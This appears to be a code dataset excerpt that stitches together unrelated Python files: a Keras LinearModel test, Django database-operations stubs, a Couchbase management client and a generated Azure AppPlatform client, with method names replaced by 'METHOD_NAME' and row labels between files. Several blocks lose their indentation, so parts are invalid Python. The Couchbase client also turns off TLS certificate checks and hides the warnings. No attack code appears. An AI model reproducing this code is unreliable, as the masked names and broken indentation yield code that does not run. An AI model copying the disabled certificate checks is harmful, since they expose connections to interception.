from tensorflow.python.keras.optimizer_v2 import gradient_descent
from tensorflow.python.keras.premade import linear
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
class LinearModelTest(keras_parameterized.TestCase):
  """Tests for the Keras premade LinearModel."""

  def METHOD_NAME(self):
    # Fit y = .3*x0 + .2*x1 from a single 2-feature input array.
    model = linear.LinearModel()
    inp = np.random.uniform(low=-5, high=5, size=(64, 2))
    output = .3 * inp[:, 0] + .2 * inp[:, 1]
    model.compile('sgd', 'mse', [])
    model.fit(inp, output, epochs=5)
    self.assertTrue(model.built)

  def test_linear_model_with_multi_input(self):
    model = linear.LinearModel()
    input_a = np.random.uniform(low=-5, high=5, size=(64, 1))
    input_b = np.random.uniform(low=-5, high=5, size=(64, 1))
    output = .3 * input_a + .2 * input_b
    model.compile('sgd', 'mse', [])
    model.fit([input_a, input_b], output, epochs=5)

  def test_linear_model_as_layer(self):
    # LinearModel composed with a Dense layer inside a functional Model.
    input_a = input_layer.Input(shape=(1,), name='a')
    output_a = linear.LinearModel()(input_a)
    input_b = input_layer.Input(shape=(1,), name='b')
    output_b = core.Dense(units=1)(input_b)
    output = output_a + output_b
    model = training.Model(inputs=[input_a, input_b], outputs=[output])
    input_a_np = np.random.uniform(low=-5, high=5, size=(64, 1))
    input_b_np = np.random.uniform(low=-5, high=5, size=(64, 1))
    output_np = .3 * input_a_np + .2 * input_b_np
    model.compile('sgd', 'mse', [])
    model.fit([input_a_np, input_b_np], output_np, epochs=5)

  def test_linear_model_with_sparse_input(self):
    # Rows sum to 1.0 (= .4 + .6) and 1.3 (= .8 + .5) once kernel is all-ones.
    indices = constant_op.constant([[0, 0], [0, 2], [1, 0], [1, 1]],
                                   dtype=dtypes.int64)
    values = constant_op.constant([.4, .6, .8, .5])
    shape = constant_op.constant([2, 3], dtype=dtypes.int64)
    model = linear.LinearModel()
    inp = sparse_tensor.SparseTensor(indices, values, shape)
    output = model(inp)
    self.evaluate(variables.global_variables_initializer())
    if context.executing_eagerly():
      weights = model.get_weights()
      weights[0] = np.ones((3, 1))
      model.set_weights(weights)
      output = model(inp)
    self.assertAllClose([[1.], [1.3]], self.evaluate(output))

  def test_linear_model_with_sparse_input_and_custom_training(self):
    batch_size = 64
    indices = []
    values = []
    target = np.zeros((batch_size, 1))
    with context.eager_mode():
      # Build a random sparse batch whose target follows y = .3*x0 + .2*x1.
      for i in range(64):
        rand_int = np.random.randint(3)
        if rand_int == 0:
          indices.append((i, 0))
          val = np.random.uniform(low=-5, high=5)
          values.append(val)
          target[i] = 0.3 * val
        elif rand_int == 1:
          indices.append((i, 1))
          val = np.random.uniform(low=-5, high=5)
          values.append(val)
          target[i] = 0.2 * val
        else:
          indices.append((i, 0))
          indices.append((i, 1))
          val_1 = np.random.uniform(low=-5, high=5)
          val_2 = np.random.uniform(low=-5, high=5)
          values.append(val_1)
          values.append(val_2)
          target[i] = 0.3 * val_1 + 0.2 * val_2
      indices = np.asarray(indices)
      values = np.asarray(values)
      shape = constant_op.constant([batch_size, 2], dtype=dtypes.int64)
      inp = sparse_tensor.SparseTensor(indices, values, shape)
      model = linear.LinearModel(use_bias=False)
      opt = gradient_descent.SGD()
      for _ in range(20):
        with backprop.GradientTape() as t:
          output = model(inp)
          loss = backend.mean(losses.mean_squared_error(target, output))
        grads = t.gradient(loss, model.trainable_variables)
        grads_and_vars = zip(grads, model.trainable_variables)
        opt.apply_gradients(grads_and_vars)

  # This test is an example for a regression on categorical inputs, i.e.,
  # the output is 0.4, 0.6, 0.9 when input is 'alpha', 'beta', 'gamma'
  # separately.
  def test_linear_model_with_feature_column(self):
    with context.eager_mode():
      vocab_list = ['alpha', 'beta', 'gamma']
      vocab_val = [0.4, 0.6, 0.9]
      data = np.random.choice(vocab_list, size=256)
      y = np.zeros_like(data, dtype=np.float32)
      for vocab, val in zip(vocab_list, vocab_val):
        indices = np.where(data == vocab)
        y[indices] = val + np.random.uniform(
            low=-0.01, high=0.01, size=indices[0].shape)
      cat_column = fc.categorical_column_with_vocabulary_list(
          key='symbol', vocabulary_list=vocab_list)
      ind_column = fc.indicator_column(cat_column)
      dense_feature_layer = dense_features_v2.DenseFeatures([ind_column])
      linear_model = linear.LinearModel(
          use_bias=False, kernel_initializer='zeros')
      combined = sequential.Sequential([dense_feature_layer, linear_model])
      opt = gradient_descent.SGD(learning_rate=0.1)
      combined.compile(opt, 'mse', [])
      combined.fit(x={'symbol': data}, y=y, batch_size=32, epochs=10)
      self.assertAllClose([[0.4], [0.6], [0.9]],
                          combined.layers[1].dense_layers[0].kernel.numpy(),
                          atol=0.01)

  def test_config(self):
    # get_config/from_config round-trip preserves constructor arguments.
    linear_model = linear.LinearModel(units=3, use_bias=True)
    config = linear_model.get_config()
    cloned_linear_model = linear.LinearModel.from_config(config)
    self.assertEqual(linear_model.units, cloned_linear_model.units)
# Standard TensorFlow test entry point when this file is run directly.
if __name__ == '__main__':
  test.main()
298,497 | combine duration expression | import json
from collections.abc import Iterable, Sequence
from datetime import date, time, timedelta
from datetime import datetime as real_datetime
from decimal import Decimal
from typing import Any
from django.core.management.color import Style
from django.db.backends.base.base import BaseDatabaseWrapper
from django.db.backends.utils import CursorWrapper
from django.db.models.base import Model
from django.db.models.constants import OnConflict
from django.db.models.expressions import Case, Expression
from django.db.models.fields import Field
from django.db.models.sql.compiler import SQLCompiler
class BaseDatabaseOperations:
    # Stub-style declaration (bodies elided with ``...``) of the operations
    # interface that Django database backends implement.
    compiler_module: str
    integer_field_ranges: dict[str, tuple[int, int]]
    set_operators: dict[str, str]
    cast_data_types: dict[Any, Any]
    cast_char_field_without_max_length: Any
    PRECEDING: str
    FOLLOWING: str
    UNBOUNDED_PRECEDING: str
    UNBOUNDED_FOLLOWING: str
    CURRENT_ROW: str
    explain_prefix: str | None
    connection: BaseDatabaseWrapper
    def __init__(self, connection: BaseDatabaseWrapper) -> None: ...
    def autoinc_sql(self, table: str, column: str) -> str | None: ...
    def bulk_batch_size(self, fields: Any, objs: Any) -> int: ...
    def cache_key_culling_sql(self) -> str: ...
    def unification_cast_sql(self, output_field: Field) -> str: ...
    def date_extract_sql(self, lookup_type: str, sql: Any, params: Any) -> tuple[str, Any]: ...
    # Removed upstream; kept for reference.
    # def date_interval_sql(self, timedelta: None) -> Any: ...
    def date_trunc_sql(self, lookup_type: str, sql: str, params: Any, tzname: str | None = ...) -> tuple[str, Any]: ...
    def datetime_cast_date_sql(self, sql: str, params: Any, tzname: str | None) -> tuple[str, Any]: ...
    def datetime_cast_time_sql(self, sql: str, params: Any, tzname: str | None) -> tuple[str, Any]: ...
    def datetime_extract_sql(self, lookup_type: str, sql: str, params: Any, tzname: str | None) -> tuple[str, Any]: ...
    def datetime_trunc_sql(self, lookup_type: str, sql: str, params: Any, tzname: str | None) -> str: ...
    def time_trunc_sql(self, lookup_type: str, sql: str, params: Any, tzname: str | None = ...) -> str: ...
    def time_extract_sql(self, lookup_type: str, sql: str, params: Any) -> str: ...
    def deferrable_sql(self) -> str: ...
    def distinct_sql(self, fields: list[str], params: list[Any] | None) -> tuple[list[str], list[str]]: ...
    def fetch_returned_insert_columns(self, cursor: Any, returning_params: Any) -> Any: ...
    def field_cast_sql(self, db_type: str | None, internal_type: str) -> str: ...
    def force_no_ordering(self) -> list[Any]: ...
    def for_update_sql(self, nowait: bool = ..., skip_locked: bool = ..., of: Any = ..., no_key: bool = ...) -> str: ...
    def limit_offset_sql(self, low_mark: int, high_mark: int | None) -> str: ...
    def last_executed_query(self, cursor: Any, sql: Any, params: Any) -> str: ...
    def last_insert_id(self, cursor: CursorWrapper, table_name: str, pk_name: str) -> int: ...
    def lookup_cast(self, lookup_type: str, internal_type: str | None = ...) -> str: ...
    def max_in_list_size(self) -> int | None: ...
    def max_name_length(self) -> int | None: ...
    def no_limit_value(self) -> str | None: ...
    def pk_default_value(self) -> str: ...
    def prepare_sql_script(self, sql: Any) -> list[str]: ...
    def process_clob(self, value: str) -> str: ...
    def return_insert_columns(self, fields: Any) -> Any: ...
    def compiler(self, compiler_name: str) -> type[SQLCompiler]: ...
    def quote_name(self, name: str) -> str: ...
    def regex_lookup(self, lookup_type: str) -> str: ...
    def savepoint_create_sql(self, sid: str) -> str: ...
    def savepoint_commit_sql(self, sid: str) -> str: ...
    def savepoint_rollback_sql(self, sid: str) -> str: ...
    def set_time_zone_sql(self) -> str: ...
    def sql_flush(
        self, style: Any, tables: Sequence[str], *, reset_sequences: bool = ..., allow_cascade: bool = ...
    ) -> list[str]: ...
    def execute_sql_flush(self, sql_list: Iterable[str]) -> None: ...
    def sequence_reset_by_name_sql(self, style: Style | None, sequences: list[Any]) -> list[Any]: ...
    def sequence_reset_sql(self, style: Style, model_list: Sequence[type[Model]]) -> list[Any]: ...
    def start_transaction_sql(self) -> str: ...
    def end_transaction_sql(self, success: bool = ...) -> str: ...
    def tablespace_sql(self, tablespace: str | None, inline: bool = ...) -> str: ...
    def prep_for_like_query(self, x: str) -> str: ...
    prep_for_iexact_query: Any
    def validate_autopk_value(self, value: int) -> int: ...
    def adapt_unknown_value(self, value: Any) -> Any: ...
    def adapt_datefield_value(self, value: date | None) -> str | None: ...
    def adapt_datetimefield_value(self, value: real_datetime | None) -> str | None: ...
    def adapt_timefield_value(self, value: real_datetime | time | None) -> str | None: ...
    def adapt_decimalfield_value(
        self, value: Decimal | None, max_digits: int | None = ..., decimal_places: int | None = ...
    ) -> str | None: ...
    def adapt_ipaddressfield_value(self, value: str | None) -> str | None: ...
    def adapt_json_value(self, value: Any, encoder: type[json.JSONEncoder] | None) -> str: ...
    def adapt_integerfield_value(self, value: Any, internal_type: Any) -> Any: ...
    def year_lookup_bounds_for_date_field(self, value: int, iso_year: bool = ...) -> list[str]: ...
    def year_lookup_bounds_for_datetime_field(self, value: int, iso_year: bool = ...) -> list[str]: ...
    def get_db_converters(self, expression: Expression) -> list[Any]: ...
    def convert_durationfield_value(
        self, value: float | None, expression: Expression, connection: BaseDatabaseWrapper
    ) -> timedelta | None: ...
    def check_expression_support(self, expression: Any) -> None: ...
    def conditional_expression_supported_in_where_clause(self, expression: Any) -> bool: ...
    def combine_expression(self, connector: str, sub_expressions: list[str]) -> str: ...
    def METHOD_NAME(self, connector: Any, sub_expressions: Any) -> str: ...
    def binary_placeholder_sql(self, value: Case | None) -> str: ...
    def modify_insert_params(self, placeholder: str, params: Any) -> Any: ...
    def integer_field_range(self, internal_type: Any) -> tuple[int, int]: ...
    def subtract_temporals(self, internal_type: Any, lhs: Any, rhs: Any) -> tuple[str, tuple[Any, ...]]: ...
    def window_frame_start(self, start: Any) -> str: ...
    def window_frame_end(self, end: Any) -> str: ...
    def window_frame_rows_start_end(self, start: int | None = ..., end: int | None = ...) -> tuple[str, str]: ...
    def window_frame_range_start_end(self, start: int | None = ..., end: int | None = ...) -> tuple[str, str]: ...
    def explain_query_prefix(self, format: str | None = ..., **options: Any) -> str: ...
    def insert_statement(self, on_conflict: OnConflict | None = ...) -> str: ...
    def on_conflict_suffix_sql(
        self, fields: Any, on_conflict: Any, update_fields: Any, unique_fields: Any
    ) -> str | Any: ...
    def format_for_duration_arithmetic(self, sql: str) -> str: ...
298,498 | add bucket | import os
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
from requests.auth import HTTPBasicAuth
from setup_app.utils.base import logIt
try:
requests.packages.urllib3.disable_warnings()
except:
pass
class FakeResult:
    """Minimal stand-in for a ``requests`` response, used when a request
    cannot be made at all (e.g. a connection failure)."""

    # Mirror the attributes callers read from a real response object.
    ok = False
    reason = ''
    text = ''

    def json(self):
        """Return an error payload, mimicking a failed API response body."""
        return {'error': True}
class CBM:
    """
    Thin Couchbase management client: REST administration calls plus N1QL
    query execution, authenticated with HTTP basic auth (TLS verification
    disabled).
    """
    def __init__(self, host, admin, password, port=18091, n1qlport=18093):
        self.host = host
        self.port = port
        self.n1qlport = n1qlport
        self.auth = HTTPBasicAuth(admin, password)
        self.set_api_root()

    def set_api_root(self):
        # Build the REST root and the N1QL query-service endpoint from
        # host/ports; called again if host or ports are changed.
        self.api_root = 'https://{}:{}/'.format(self.host, self.port)
        self.n1ql_api = 'https://{}:{}/query/service'.format(self.host, self.n1qlport)

    def _get(self, endpoint):
        # NOTE(review): os.path.join is used to compose URLs — works for these
        # relative endpoints on POSIX, but it applies filesystem-path
        # semantics; confirm intended.
        api = os.path.join(self.api_root, endpoint)
        try:
            result = requests.get(api, auth=self.auth, verify=False)
        except Exception as e:
            # Connection failures are converted into a FakeResult so callers
            # can handle them like an HTTP error response.
            result = FakeResult()
            result.reason = 'Connection failed. Reason: ' + str(e)
        self.logIfError(result)
        return result

    def _delete(self, endpoint):
        api = os.path.join(self.api_root, endpoint)
        result = requests.delete(api, auth=self.auth, verify=False)
        self.logIfError(result)
        return result

    def _post(self, endpoint, data):
        url = os.path.join(self.api_root, endpoint)
        result = requests.post(url, data=data, auth=self.auth, verify=False)
        self.logIfError(result)
        return result

    def _put(self, endpoint, data):
        url = os.path.join(self.api_root, endpoint)
        result = requests.put(url, data=data, auth=self.auth, verify=False)
        self.logIfError(result)
        return result

    def get_system_info(self):
        """Return the cluster info dict from pools/default, or {} on failure."""
        result = self._get('pools/default')
        if result.ok:
            return result.json()
        return {}

    def get_buckets(self):
        return self._get('pools/default/buckets')

    def delete_bucket(self, bucket_name):
        return self._delete('pools/default/buckets/'+bucket_name)

    def METHOD_NAME(self, bucket_name, ram_quota, bucket_type='couchbase'):
        """Create a bucket with the given RAM quota (MB)."""
        data = {
            'name': bucket_name,
            'bucketType': bucket_type,
            'ramQuotaMB': ram_quota,
            'authType': 'sasl',
        }
        return self._post('pools/default/buckets', data)

    def get_certificate(self):
        """Return the cluster certificate text, or '' on failure."""
        result = self._get('pools/default/certificate')
        if result.ok:
            return result.text
        return ''

    def exec_query(self, query):
        """Execute an N1QL statement against the query service."""
        logIt("Executing n1ql {}".format(query))
        data = {'statement': query}
        result = requests.post(self.n1ql_api, data=data, auth=self.auth, verify=False)
        self.logIfError(result)
        return result

    def test_connection(self):
        result = self._get('pools/')
        return result

    def initialize_node(self, path='/opt/couchbase/var/lib/couchbase/data',
                        index_path='/opt/couchbase/var/lib/couchbase/data'):
        data = {'path':path, 'index_path':index_path}
        result = self._post('nodes/self/controller/settings', data)
        return result

    def rename_node(self, hostname='127.0.0.1'):
        data = {'hostname': hostname}
        try:
            result = self._post('node/controller/rename', data)
        except Exception as e:
            result = FakeResult()
            result.reason = 'Node rename failed. Reason: ' + str(e)
        return result

    def set_index_storage_mode(self, mode='plasma'):
        data = {'storageMode': mode}
        result = self._post('settings/indexes', data)
        return result

    def set_index_memory_quta(self, ram_quota=256):
        # NOTE: the method name keeps the existing (misspelled) public
        # spelling 'quta' to avoid breaking callers.
        data = {'indexMemoryQuota': ram_quota}
        result = self._post('pools/default', data)
        return result

    def setup_services(self, services=['kv','n1ql','index']):
        # NOTE(review): mutable default argument; appears read-only here, but
        # confirm no caller mutates the list.
        data = {'services': ','.join(services)}
        result = self._post('node/controller/setupServices', data)
        return result

    def get_services(self):
        result = self._get('pools/default/nodeServices')
        return result

    def set_admin_password(self):
        data = {
            'password': self.auth.password,
            'username': self.auth.username,
            'port': 'SAME',
        }
        result = self._post('settings/web', data)
        return result

    def create_user(self, username, password, fullname, roles):
        data = {
            'name': fullname,
            'password': password,
            'roles': roles,
        }
        result = self._put('settings/rbac/users/local/'+username, data)
        return result

    def whoami(self):
        result = self._get('whoami')
        return result.json()

    def logIfError(self, result):
        # Best-effort logging of API errors; any failure to decode the
        # response body is deliberately swallowed.
        try:
            js = result.json()
            if 'errors' in js:
                msg = "Error executing query: {}".format(', '.join([err['msg'] for err in js['errors']]))
                # NOTE(review): the message is logged twice — the second call's
                # True argument presumably flags it differently in logIt;
                # confirm against logIt's signature.
                logIt(msg)
                logIt(msg, True)
            else:
                logIt("Query Result: {}".format(str(js)))
        except:
            pass
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Optional, TYPE_CHECKING
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core import AsyncARMPipelineClient
from msrest import Deserializer, Serializer
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from azure.core.credentials_async import AsyncTokenCredential
from ._configuration import AppPlatformManagementClientConfiguration
from .operations import ServicesOperations
from .operations import AppsOperations
from .operations import BindingsOperations
from .operations import CertificatesOperations
from .operations import CustomDomainsOperations
from .operations import DeploymentsOperations
from .operations import Operations
from .operations import RuntimeVersionsOperations
from .operations import SkuOperations
from .. import models
class AppPlatformManagementClient(object):
    """REST API for Azure Spring Cloud.

    :ivar services: ServicesOperations operations
    :vartype services: azure.mgmt.appplatform.v2019_05_01_preview.aio.operations.ServicesOperations
    :ivar apps: AppsOperations operations
    :vartype apps: azure.mgmt.appplatform.v2019_05_01_preview.aio.operations.AppsOperations
    :ivar bindings: BindingsOperations operations
    :vartype bindings: azure.mgmt.appplatform.v2019_05_01_preview.aio.operations.BindingsOperations
    :ivar certificates: CertificatesOperations operations
    :vartype certificates: azure.mgmt.appplatform.v2019_05_01_preview.aio.operations.CertificatesOperations
    :ivar custom_domains: CustomDomainsOperations operations
    :vartype custom_domains: azure.mgmt.appplatform.v2019_05_01_preview.aio.operations.CustomDomainsOperations
    :ivar deployments: DeploymentsOperations operations
    :vartype deployments: azure.mgmt.appplatform.v2019_05_01_preview.aio.operations.DeploymentsOperations
    :ivar operations: Operations operations
    :vartype operations: azure.mgmt.appplatform.v2019_05_01_preview.aio.operations.Operations
    :ivar runtime_versions: RuntimeVersionsOperations operations
    :vartype runtime_versions: azure.mgmt.appplatform.v2019_05_01_preview.aio.operations.RuntimeVersionsOperations
    :ivar sku: SkuOperations operations
    :vartype sku: azure.mgmt.appplatform.v2019_05_01_preview.aio.operations.SkuOperations
    :param credential: Credential needed for the client to connect to Azure.
    :type credential: ~azure.core.credentials_async.AsyncTokenCredential
    :param subscription_id: Gets subscription ID which uniquely identify the Microsoft Azure subscription. The subscription ID forms part of the URI for every service call.
    :type subscription_id: str
    :param str base_url: Service URL
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
    """

    def __init__(
        self,
        credential: "AsyncTokenCredential",
        subscription_id: str,
        base_url: Optional[str] = None,
        **kwargs: Any
    ) -> None:
        if not base_url:
            # Default to the public Azure Resource Manager endpoint.
            base_url = 'https://management.azure.com'
        self._config = AppPlatformManagementClientConfiguration(credential, subscription_id, **kwargs)
        self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs)

        # Every model class exported by the generated models module is
        # registered with the (de)serializers.
        client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
        self._serialize = Serializer(client_models)
        self._serialize.client_side_validation = False
        self._deserialize = Deserializer(client_models)

        # One operation-group instance per API surface, all sharing the same
        # pipeline client, configuration and (de)serializers.
        self.services = ServicesOperations(
            self._client, self._config, self._serialize, self._deserialize)
        self.apps = AppsOperations(
            self._client, self._config, self._serialize, self._deserialize)
        self.bindings = BindingsOperations(
            self._client, self._config, self._serialize, self._deserialize)
        self.certificates = CertificatesOperations(
            self._client, self._config, self._serialize, self._deserialize)
        self.custom_domains = CustomDomainsOperations(
            self._client, self._config, self._serialize, self._deserialize)
        self.deployments = DeploymentsOperations(
            self._client, self._config, self._serialize, self._deserialize)
        self.operations = Operations(
            self._client, self._config, self._serialize, self._deserialize)
        self.runtime_versions = RuntimeVersionsOperations(
            self._client, self._config, self._serialize, self._deserialize)
        self.sku = SkuOperations(
            self._client, self._config, self._serialize, self._deserialize)

    async def _send_request(self, http_request: HttpRequest, **kwargs: Any) -> AsyncHttpResponse:
        """Runs the network request through the client's chained policies.

        :param http_request: The network request you want to make. Required.
        :type http_request: ~azure.core.pipeline.transport.HttpRequest
        :keyword bool stream: Whether the response payload will be streamed. Defaults to True.
        :return: The response of your network call. Does not do error handling on your response.
        :rtype: ~azure.core.pipeline.transport.AsyncHttpResponse
        """
        # The subscription id is baked into the URL template of every request.
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        }
        http_request.url = self._client.format_url(http_request.url, **path_format_arguments)
        stream = kwargs.pop("stream", True)
        pipeline_response = await self._client._pipeline.run(http_request, stream=stream, **kwargs)
        return pipeline_response.http_response

    async def METHOD_NAME(self) -> None:
        # Release the underlying pipeline/transport resources.
        await self._client.METHOD_NAME()

    async def __aenter__(self) -> "AppPlatformManagementClient":
        await self._client.__aenter__()
        return self

    async def __aexit__(self, *exc_details) -> None:
        # BUG FIX: the original line carried a stray trailing "|" (extraction
        # residue) that made this statement a syntax error.
        await self._client.__aexit__(*exc_details)
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.